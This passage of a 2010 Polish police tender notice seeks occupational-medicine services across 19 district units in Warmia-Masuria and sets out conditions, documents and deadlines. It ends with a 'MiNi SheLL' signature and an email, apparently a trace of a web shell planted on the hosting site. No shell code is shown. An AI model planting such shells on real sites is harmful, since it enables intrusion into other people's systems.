b)prowadzenia analiz stanu zdrowia Pracowników, w tym zaliczanych do grup ryzyka i składanie Zamawiającemu w formie pisemnej rocznych informacji do 31 grudnia każdego roku kalendarzowego, oraz na 30 dni przed upływem ważności umowy,
c)prowadzenia na wydzielonym dysku twardym, imiennej kartoteki komputerowej Pracowników (baza danych, do której obsługi niezbędny jest system operacyjny Windows XP i program narzędziowy Excel) objętych badaniami i szczepieniami ochronnymi, obejmującej następujące dane:
- imię i nazwisko,
- nazwa jednostki zlecającej badanie/szczepienie,
- datę wyznaczenia badania/szczepienia,
- datę przeprowadzenia badania/szczepienia,
- rodzaj wykonanych badań/szczepień,
- datę wydania i datę ważności zaświadczenia,
- datę wykonania i datę ważności szczepienia,
d)prowadzenia dokumentacji medycznej oraz komputerowej kartoteki, o której mowa w pkt. c, chronienia jej i udostępniania zgodnie z Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 15 września 1997 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy oraz sposobu jej prowadzenia i przechowywania (Dz. U. Nr 120, poz. 768 z późn. zm.) oraz Rozporządzeniem Ministra Zdrowia z dnia 19 grudnia 2002 r. w sprawie wykazu obowiązkowych szczepień ochronnych oraz zasad przeprowadzania i dokumentacji szczepień (Dz. U. Nr 237, poz. 2018 z późn. zm.).
3.W przypadku rozwiązania umowy lub upływu terminu jej obowiązywania, Wykonawca w terminie14 dni licząc od daty pisemnego (dopuszcza się drogę faksową) wezwania przez Zamawiającego, zobowiązany jest do protokólarnego przekazania podmiotowi wskazanemu przez Zamawiającego:
a) dokumentacji medycznej Pracowników,
b) imiennej kartoteki komputerowej Pracowników - na wydzielonym dysku twardym.
4. Zamawiający wymaga aby badania, o których mowa w pkt 3.1, wykonywane były w jednej placówce medycznej Wykonawcy, na terenie miasta (odpowiednio dla każdej jednostki Policji) , czynnej w dni robocze od poniedziałku do piątku, w godzinach co najmniej od 08.00 do 16.00.
5.  Placówka medyczna o której mowa w pkt. 4, powinna posiadać:
-gabinety w ilości odpowiedniej do ilości oddelegowanych lekarzy, skierowanych do realizacji zadań wynikających z umowy,
-gabinet zabiegowy, w którym Wykonawca zapewni co najmniej w godzinach 08.00 - 11.00 pobieranie materiału do badań laboratoryjnych,
-pracownię RTG (duży obrazek),
-pracownię EKG.
Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2. Zamawiający, oceni czy Wykonawca spełnia warunki o których mowa w pkt. 1 dla zadania (zadań) na które składana jest oferta na podstawie złożonego wraz z ofertą zgodnie z art. 44 ustawy Pzp Oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie z załączonym wzorem).
3.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia poszczególne warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące posiadania niezbędnej wiedzy i doświadczenia do wykonania zamówienia.
2. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Zamawiający, oceni czy Wykonawca spełnia warunki o których mowa w pkt. 1 dla zadania (zadań) na które składana jest oferta na podstawie złożonego wraz z ofertą zgodnie z art. 44 ustawy Pzp Oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie z załączonym wzorem).
4.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia poszczególne warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące  dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia.
2. Wykonawca może polegać na  potencjale technicznym  innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3.  Zamawiający, oceni czy Wykonawca spełnia warunki o których mowa w pkt. 1 dla zadania (zadań) na które składana jest oferta na podstawie złożonego wraz z ofertą zgodnie z art. 44 ustawy Pzp Oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie z załączonym wzorem).
4.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia poszczególne warunki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące  dysponowania  osobami zdolnymi do wykonania zamówienia.
2. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3.  Zamawiający, oceni czy Wykonawca spełnia warunki o których mowa w pkt. 1 dla zadania (zadań) na które składana jest oferta na podstawie złożonego wraz z ofertą zgodnie z art. 44 ustawy Pzp Oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie z załączonym wzorem).
4.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia poszczególne warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej, do wykonania zamówienia.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Zamawiający, oceni czy Wykonawca spełnia warunki o których mowa w pkt. 1 dla zadania (zadań) na które składana jest oferta na podstawie złożonego wraz z ofertą zgodnie z art. 44 ustawy Pzp Oświadczenia o spełnianiu warunków udziału w postępowaniu (zgodnie z załączonym wzorem).
4.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia poszczególne warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na  podstawie art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w sytuacji gdy:
-niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania umowy,
-nastąpiła zmiana wartości usług świadczonych przez Wykonawcę w ramach przedmiotu umowy, a zmiana zwartej umowy jest korzystna dla Zamawiającego
-zmiana w przepisach regulujących profilaktyczną opiekę zdrowotną w Policji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warminsko-mazurska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji Sekcja Zamówień Publicznych i Funduszy Pomocowych ul. Partyzantów 6-8, 10-521 Olsztyn fax 089 522-52-05..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 13:00, miejsce: Komenda Wojewódzka Policji Wydział Zaopatrzenia i Inwestycji (Sekretariat) ul. Pstrowskiego 3, 10-049 Olsztyn..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KWP/KMP/Olsztyn oraz oraz funkcjonariusze i pracownicy komórek terenowych i stanowisk samodzielnych KGP..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KWP/KMP w Olsztynie oraz funkcjonariuszy i pracwoników komórek terenowych i stanowisk samodzielnych KGP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KPP Bartoszyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Bartoszycach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KPP Braniewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Braniewie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KPP Działdowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Działdowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KMP Elbląg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KMP w Elblągu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KPP Ełk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Ełku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> KPP Gizycko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Giżycku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> KPP Gołdap.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Gołdapi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> KPP Iława.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Iławie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> KPP Kętrzyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Kętrzynie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> KPP Lidzbark Warmińki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Lidzbarku Warmińskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> KPP Mrągowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Mrągowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> KPP Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Nidzicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> KPP Nowe Miasto Lubawskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Nowym Mieście Lubawskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> KPP Olecko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Olecku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> KPP Ostróda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Ostródzie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> KPP Pisz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Piszu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> KPP Szczytno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Szczytnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> KPP Węgorzewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy określonych w  sekcji II pkt. 1.3 ogłoszenia, na potrzeby KPP w Węgorzewie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com